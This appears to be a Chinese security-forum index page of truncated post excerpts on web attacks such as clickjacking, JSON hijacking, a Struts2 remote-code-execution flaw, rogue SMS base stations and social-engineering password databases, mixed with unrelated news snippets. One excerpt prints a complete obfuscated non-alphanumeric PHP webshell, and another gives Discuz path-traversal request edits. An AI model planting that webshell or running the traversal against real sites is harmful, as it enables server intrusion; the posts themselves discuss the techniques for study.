给大家说一个找那些后台隐藏很深网站后台的技巧 霸气帝王攻 | 2013-06-01 01:47 话说现在安全做的越来越到位了，getshell很少碰到了，不过猪肉店还是常有的，

昨天西安某路发生一起因小事件引起的打架冲突，现场一百多人围观…… 驻足观察了片刻，现场真是热闹非凡，有吵的面红耳赤、声音嘶哑、眼睛淤肿、衣着不

今天有朋友下载了一个软件： 第一微销微信自动加粉丝软件 电脑版.rar （已放入病毒样本压缩包中） 运行后，电脑出现问题（爆卡），随后检查，发现 GoTop 挂

阅读声明/警告/提示： 本文内容并非是教唆读者进行什么非法、犯罪活动，仅仅是纯技术性的讨论，可以看做是意淫，本人不承担任何所谓的法律责任！请各

0x00 相关背景介绍 随着人们的生活越来越离不开网络，也越来越离不开移动手机，一般的公共厂商都已经将wifi作为基础服务进行提供，譬如在星巴克、麦当

PS：不确定文章中的内容会不会被和谐 互联网中劫持可以理解为正常用户的请求在返回响应之前响应内容被篡改，或者正常用户的请求内容被非法获取从而代

0x00 相关背景介绍 Clickjacking（点击劫持）是由互联网安全专家罗伯特·汉森和耶利米·格劳斯曼在2008年首创的。 是一种视觉欺骗手段，在

之前在 zone 里边有人讨论过CISCO 的后门问题我就说了个利用TCL cisco 的一个脚本处理技术详见 http://www.cisco.com/en/US/docs/ios/12_3t/12_3t2/feature/guide/gt_tcl.html 现在给整理出来。郑重声明本人仅讨论方法与该技术如利用

0x00 相关背景介绍 Dns是整个互联网公司业务的基础，目前越来越多的互联网公司开始自己搭建DNS服务器做解析服务，同时由于DNS服务是基础性服务非

0x00 相关背景介绍 随着互联网web和信息技术的发展，在web后端作为存储和管理的的数据库也得到了广泛的应用，与web结合较为紧密的数据库包括My

0x00 相关背景介绍 由于应用越来越多的需要和其他的第三方应用交互，以及在自身应用内部根据不同的逻辑将用户引向到不同的页面，譬如一个典型的登录接口就

[ 目录 ] [0x00] 背景 [0x01] 挖掘漏洞 [0x02] 优雅利用 [0x03] 从反射到rootkit [0x04] 总结 [0x00] 背景 这篇迟到了近一年的paper是对 WooYun: Gmail某处XSS可导致账号持久劫

Json hijacking/Json劫持漏洞 2012/12/28 17:45 | xsser 0x00 相关背景介绍 JSON(JavaScript Object Notation) 是一种轻量级的数据交换格式。易于人阅读和编写。同时也易于机器解析和生成。它

GNU Radio USRP OpenBTS 小区短信 区域短信，2012-12-15 14:48 通过一朋友知道原来还有“免费发短信”的设备， 后来在网上翻阅了一些资料发现很多人都在做这个东西

讨论一种牛逼的短信群发的技术 苦战 | 2013-05-27 20:56 听说有种设备直接往小区楼下晃一圈，直接整个小区的所有手机都能收到设备事先准备好的广告短信~ 有人知道这种

Tweetable PHP-Non Alpha Thursday, 13 December 2012 I started to try and break the 10 charset limit of PHP non-alpha after @InsertScript showed me that PHP Dev supports [] syntax for arrays. I wondered if it would be possible to break the limit within production PHP. At first I thought you could but then after some testing I found that there was no way to concat without “.”

这种php的数据表示方法是国外几个大牛提出来的。 Tweetable PHP-Non Alpha 蛋疼了研究了下，写出了个微型shell <?php $_[]++;$_[]=$_._;$_=$_[$_[+_]];$_=$__=$___=$____=$_____=$______=$_[+_]; $_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; $___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++;$___++; $____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++;$____++; $_____++;$_____++;$_____++;$_____++; $______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++;$______++; $_=$_.$__.$___.$____.$_____.$______;$_("ipconfig"); ?> 简单说明下 $_[]++; $_[]=$_._; $_=$_[$_[+_]]; $_=$_[+_]; //使用数

安卓设备时兴搞内置存储(甚至以此不支持sd卡)。一个YD拒绝服务思路：以USB存储模式接入电脑，删掉.android_secure/LOST

故事大概是这样的：我养了一只鸡。 这可是一只天下独一无二的鸡！因为它的DNA序列和其他的鸡是不同的。 这只鸡它会长毛。一身鸡毛。所以它可以作为一

谷歌被迫支付5亿美元和解费（TechWeb配图） 腾讯科技讯（瑞雪）北京时间5月26日消息，国外媒体近日刊载文章，讲述了职业骗子大卫·安东尼·

说到社工库，现在很流行，数据也越来越庞大、详细，其威胁程度日愈严重。 其中威胁最高的就属密码库了，也是数量最大，影响范围最广的。 密码库主要来源

今天看了@黑屌丝的文章，就百度了下有关硬盘的知识，在此发表下拙见，错误不足之处，往各位看官批评指出！ 先科普一下， 硬盘数据结构一般分为引导扇区

北京时间5月22日消息，据国外媒体报道，两年前，斯坦福大学教授吴恩达（Andrew Ng）加入谷歌开发团队X Lab。X Lab团队为谷歌开发出了

原文作者：imlonghao，原文标题：迅雷云你伤不起啊 [ 本文目录 ] 起因 有点问题 情况不对 DDoS deflate战败 检查特征 初见成效 蛋疼又来 写在后面

爆点料，S站各种大牛是咋运营推广的。 咚咚呛 (邪恶的瞅瞅！！) | 2013-05-10 11:08 小弟突然对此突感兴趣，求科普下 第一，购买空间，需要网银支付（有交易就有证据

用户 - 用户栏目 - 栏目分组 抓包 Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]" 改为 Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]" 访问 /home.php?mod=spacecp&id=../../robots.txt%0057 虽然涉及0x00截断 但无视 GPC source zafe 发表于 2013-5-24 10:22 ********************************************************************* 说下具体怎么利用 原帖测试的是dz x3，我测试的

警方破获的作案工具和涉案资金。 广州警方摧毁跨境网络赌博团伙 投注额近千亿 广州警方摧毁千亿元跨境赌球团伙 抓捕123人 10万人参赌 投注近千亿 广州警

摘要 Apache官方的struts2产品，最近出了一个远程代码执行漏洞，编号“S2-013”，目前是0DAY，官方没有修补方案出现。 http://struts.apache.org/development/2.x/docs/security-bulletins.html — （公

注：利用工具可以用任意语言编写其实就是发送漏洞代码就行了。一个request一个response，我尝试用过纯JS PHP JSP JavaSwing JavaFX 现在android

注：版权所有，转载请注明出处。 今天要讲的这个漏洞是一个非常猥琐的漏洞。 大部分网站都有这个漏洞，不光是百度。 什么是XSIO，为什么说它猥琐呢？